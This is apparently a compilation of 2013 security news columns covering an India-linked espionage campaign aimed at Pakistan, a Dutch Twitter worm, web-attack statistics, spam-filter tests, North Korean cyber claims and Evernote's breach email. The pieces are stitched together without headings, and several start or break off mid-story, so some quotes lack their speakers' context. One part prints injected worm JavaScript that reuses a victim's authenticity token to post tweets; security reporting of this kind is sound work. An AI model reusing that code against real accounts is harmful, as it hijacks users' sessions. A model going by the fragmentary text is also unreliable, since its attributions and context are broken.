Using a code signing certificate (issued to what looks like a legitimate company 'Technical and Commercial Consulting Pvt. Ltd') to sign malicious binaries the chances of them being able to distribute the payload was greatly improved. The company concerned, ESET says, was based in New Delhi and the certificate itself was issued in 2011. Documents, mainly PDFs, attached to emails were infected with data stealing malware and signed off with the aforementioned certificate to add authenticity.

ESET malware researcher Jean-Ian Boutin reveals that during the investigation there were several leads that indicated the threat originates from India. "First, the code signing certificate was issued to an Indian company. In addition, all the signing timestamps are between 5:06 and 13:45 UTC, which is consistent with 8-hour work shifts falling between 10:36 and 19:15 in Indian Standard Time" he says, continuing, "we have identified several different documents that followed different themes likely to be enticing to the recipients. One of these is the Indian armed forces". Although Boutin admits that there is no precise information at this point as to which individuals or organisations were specifically targeted by the files. "Based on our investigations" he continues "it is our assumption that people and institutions in Pakistan were targeted".

One of the fake PDF files was delivered through a self-extracting archive called “pakistandefencetoindiantopmiltrysecreat.exe”, and ESET telemetry data shows that Pakistan is heavily affected by this campaign with 79% of detections being in that country. The first infection vector was utilising a widely used and abused vulnerability known as CVE-2012-0158. This vulnerability can be exploited by specially crafted Microsoft Office documents and allows arbitrary code execution. The documents were delivered by email, and the malicious code was executed as soon as the document was opened – without the attacked computer user even knowing. The other infection vector was via Windows executable files appearing to be Word or PDF documents – again distributed via email. In both cases, to evade suspicion by the victim, fake documents are shown to the user on execution.

"The malware was stealing sensitive data from infected PCs and sending them to the attackers’ servers" Boutin adds "It was using various types of data-stealing techniques, among them a key-logger, taking screenshots and uploading documents to attackers’ computer. Interestingly, the information stolen from an infected computer was uploaded to the attacker’s server unencrypted."

As you can see from the above screenshot, several strings in the binaries analysed by ESET are related to Indian culture, in particular a variable called ramukaka was used. Boutin explains that "Ramu Kaka is a typical Bollywood-style servant in a house. Considering that this variable is responsible for achieving persistence on the system, this definition is a good fit".

However, the most compelling argument to suggest that the attacks originate in India is to be found within the ESET research telemetry data. According to Boutin lots of malware variants tied to the attack appeared in the same location during a small time-frame. Each of these were very similar to each other, which strongly suggests an attempt to evade malware detection. "These files all appeared in the same region of India" Boutin concludes...

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:

function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length > 0 && $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".

Cross-Site Request Forgery (CSRF) is an attack mode that forces the end user to execute an unwanted action on a web application in which they are currently authenticated. Cross-Site Scripting (XSS) involves the insertion of malicious code into webpages in order to manipulate website visitors. SQL Injection, as everyone surely knows by now, involves entering malicious commands into URLs and text fields on websites that happen to be vulnerable, usually in an attempt to steal the contents of databases storing valuable data such as credit card details or usernames and passwords. And finally, Directory Traversal (also known as a Path Traversal attack) aims to access files and directories that are stored outside the web root folder.

At the InfoSecurity Europe show yesterday, Firehost revealed its 2013 web application attack statistics for the first quarter of the year which detailed this superfecta as blocked by the firewalls protecting its servers in both Europe and the United States during the period covering January to March 2013.

The volume of Cross-Site Request Forgery (CSRF) attacks was up by an astonishing 132% by the end of the quarter, compared to the same period during 2012. The second most significant increase in frequency was seen in SQL injections which rose by 87%. Overall, however, Cross-Site Scripting (XSS) was the most prevalent Superfecta attack type during the period monitored, with more than 1,200,000 attacks being blocked in total.

"The Superfecta represents the most dangerous type of cyberattack traffic, but these are by no means advanced or difficult attacks for cybercriminals to launch" says Chris Hinkley, Senior Security Engineer at FireHost who continues "for example, cross-site request forgery attacks and cross site scripting attacks are extremely automated and require very little knowledge to implement. It only makes sense that CSRF attacks would increase due to more automated attacks in the arsenals of cybercriminals. SQL Injection attacks represent a smaller portion of the attack traffic we block for our customers, as these attacks require more expertise, but when they're successful, they are very effective. Many will remember or have even been affected by successful SQL Injection attacks on a number of global brands over the past few years. What these numbers really say is malicious web traffic is very diverse and businesses should ensure that they are doing as much as possible to mitigate it."

Hear the name 'Virus Bulletin' and you immediately think of anti-virus and anti-malware certification and testing, but the same organization also carries out comprehensive spam filtering reviews. In the latest of these anti-spam comparative reviews, some 17 of the products and services put to the test passed with colours that flew enough to get the coveted 'VBSpam award' but there's a catch: the majority of them did so by catching less spam than they used to. In fact, a lot less spam. Of the 19 anti-spam solutions tested, only a rather worrying three of them managed to improve their spam catch rates with nine seeing the percentage of spam they missed at least double compared with recent test results. Indeed, as a result of the overall test figures, Virus Bulletin now reckons that a spam is almost twice as likely to make it into your inbox on average when compared to the previous batch of tests.

If that wasn't bad enough, it appears that the majority of the products tested also had quite a bit more difficulty in preventing false positives. Only four of them correctly identified all the legitimate email in the test runs. When it came to one of the biggest scourges in the average email inbox, phishing scams, more than half of the filters failed missed "at least 10%" of them in a dedicated feed of pure phishing mail messages.

This downward trend has been spotted before as a result of the VB testing, a very similar statistical drop popped up early in 2012 and continued throughout the first half of the year before the filters caught up with the con men and halted the decline. "Spam has been a relatively good news story in recent years, with spam levels declining while catch rates remained high," VB's Anti-Spam Test Director, Martijn Grooten insists though "in spam filtering, the devil is in the details, and when we look at these details, we see more emails slipping through the maze."

Considering that much of the spam that gets delivered will come complete with malware attachments or links to an exploited web site, the fact that spam catch rates are falling is of concern. Not least as it suggests that the bad guys are keeping ahead of the good guys in terms of tweaking the delivery process in order to avoid the filtering traps. While the anti-spam industry does appear to have a record of catching up with these tricks and tweaks, the fact that it takes them half a year to do so really isn't good enough.

The KCNA claims that the attacks, which are believed to have taken down official state websites such as KCNA itself, were targeted to coincide with the military drills by the US and South Korea. Calling the attack cowardly and despicable, KCNA went on to insist that the "US and South Korean puppet regime are massively bolstering up cyber forces in a bid to intensify the subversive activities and sabotages against the DPRK". The KCNA statement went on to claim that "intensive and persistent virus attacks are being made every day on Internet servers operated by the DPRK".

It's not only the KCNA which is reporting that cyber attacks have been launched against the North Korean state. In Russia, the Ita-Tass news agency has also claimed that some official North Korean websites were disabled after servers were brought down during a "powerful hacker attack".

Of course, it is perhaps a little hypocritical that North Korea should be complaining about being the victim of state sponsored cyber attack when it has long been thought to be engaging in exactly the same thing itself. Not only have defectors to the South insisted that North Korea has recruited thousands of hackers to become part of a 'cyber warfare unit' similar to the Third Department of the Chinese People's Liberation Army (PLA) which is thought to have a specialist hacker section known as the 'Comment Crew'. Indeed, back in 2011 The Economist magazine reported how North Korea had hired out 30 elite programmers to a criminal group working out of China in order to steal millions of dollars from South Korean online gaming companies. This kind of state sponsored corporate crime is different to the normal cyber-warfare disruption tactic, and is designed purely to make money.

According the The Economist the hackers netted some $6m, and this "is understood to have gone ultimately to the so-called Office 39, a department of the North Korean government responsible for earning foreign currency through illicit means, including drug trafficking" in order to get around the international sanctions which have made it so hard for North Korea to earn foreign currency. Not that the North Koreans are ignoring traditional cyber-warfare tactics, with that same report recounting how South Korean government websites have been crippled by DDoS attacks.

Jarno Limnell, a doctor in military science and also director of cyber-security for Stonesoft, warns "It’s an increasingly tense situation, and from a regional security point of view it’s important for America to be seen to be flexing its muscles. In cyber warfare, offense is typically a step or two ahead of defence. There is no such thing as a cast iron defence strategy when new threats and exploits emerge continually. As such, it is essential that sometimes the U.S. candidly communicates the power of its offensive capabilities as a deterrent. Akin to the scenario of mutually assured destruction at the hands of nuclear weapons during the cold war, the threat of vastly destructive retaliatory cyber capabilities is a powerful deterrent for prospective enemies and rogue states."

"The number of organizations that are potential targets for state-sponsored cyber attacks is probably much higher than 50%, because if attackers can’t break into a targeted organization, they will go after partners and suppliers" Keanini insists, adding "Frankly, I’m surprised that the level of paranoia among information security professionals isn’t higher."

Of course, to paraphrase a well known saying, just because you are a paranoid IT security professional doesn't mean that China isn't out to get you. Or, perhaps more accurately, just because the media says that China is the country most likely to be hacking your business doesn't mean that everyone else isn't also at it. The public perception of who is behind state-sponsored attacks is not only shaped by media reporting, but also mis-shaped if you ask me. Ask Keanini and he will say the same: "The reality is that nations that are really good at cyber attacks don’t make the news because they don’t get caught." Interestingly, when it comes to those IT security pros who were surveyed (more than 200 of them who attended the 2013 RSA Conference in San Francisco) some 48% go with China as being the best equipped for launching state-sponsored cyber attacks but 33% point the finger in the direction of the United States itself when it comes to advanced technical capability for such activity.

I'm not sure it really matters which direction state-sponsored hacking comes from, or where it is perceived to come from, or indeed if it is state-sponsored at all. Just look at the Worldwide Infrastructure Security Report from Arbor and you will see that quite clearly DDoS attacks are on the up: 76% of respondents experienced DDoS attacks towards their customers during the past year. Add to that the rise of hacktivism, with 33% reporting political and ideological disputes as the motivation behind those attacks, and it becomes clear that IT security professionals and the organisations they work for need to be focusing more on defense in depth and worrying less about apportioning blame.

As Dan Holden, Director of Arbor’s Security Engineering & Response Team, points out: "Global recognition for effective cyber security solutions in business is rising, but many still continue to bury their heads in the sand. The truth is that any business operating online - from the largest enterprise to an individual operator - can become a target for attack, because of who they are, what they sell or who they partner with. It’s extremely important that organisations of all size take best practice defensive steps to ensure they are adequately protected if, or more likely when, they become the target of an attack."

I received an email last night informing me that:

Evernote's Operations & Security team has discovered and blocked suspicious activity on the Evernote network that appears to have been a coordinated attempt to access secure areas of the Evernote Service.

This immediately sought to put my, and the 49,999,999 other people who were reading the communication, mind at rest by assuring me that Evernote was taking this seriously enough to implement an across the board password reset. This despite there being no evidence, as yet, that any of my Evernote content had been accessed, changed or stolen. Evernote also told me that no payment information for 'premium' or 'business' customers had been accessed. So far so good you may be thinking.

The bad news is that the breach investigation does reveal that the hackers were able to gain access to usernames and the emails associated with them (sound familiar yet folks?) and, yes, those all important passwords. Now, in the case of Evernote these passwords are hashed and salted, which makes them pretty robust, but once again Evernote was taking no chances and the email says:

"in an abundance of caution, we are requiring all users to reset their Evernote account passwords. Please create a new password by signing into your account on evernote.com."

Again, so far so much better, you are probably muttering and wondering what the 'farce' angle is. Well, if you examine the link in the email to reset your password (as you always should before clicking anything as scammers and cyber-criminals can be quite clever in their presentation of mis-information) you will see that it takes you to a page at:

http://links.evernote.mkt5371.com

That's not the full URL, the actual thing will be different for each user and there follows a whole bunch of meaningless characters. Meaningless to the casual observer that is. However, the point being this kind of URL looks remarkably similar to the obfuscated variety that phishers and their ilk use to fool users into clicking them: they start with something that includes the product or service name but actually isn't the product or service URL itself. So in this case the link text in the email states 'evernote.com' but actually points to 'links.evernote.mkt5371.com' which is a totally different kettle of fish and raises alarm bells with anyone who has been properly schooled in taking security seriously.

The real farce starts when you continue reading the email and discover that amongst the "several important steps that you can take to ensure that your data on any site, including Evernote, is secure" which the security team helpfully have provided there is, right there at number three on the list:

"Never click on 'reset password' requests in emails - instead go directly to the service"

Sorry Evernote, you get kudos for doing the right thing but I'm afraid that you have shot yourself in both feet for doing it in the wrong way. It's important that you eat your own dog food in the security business, that is you yourselves follow the advice that you give others, and in this case you didn't.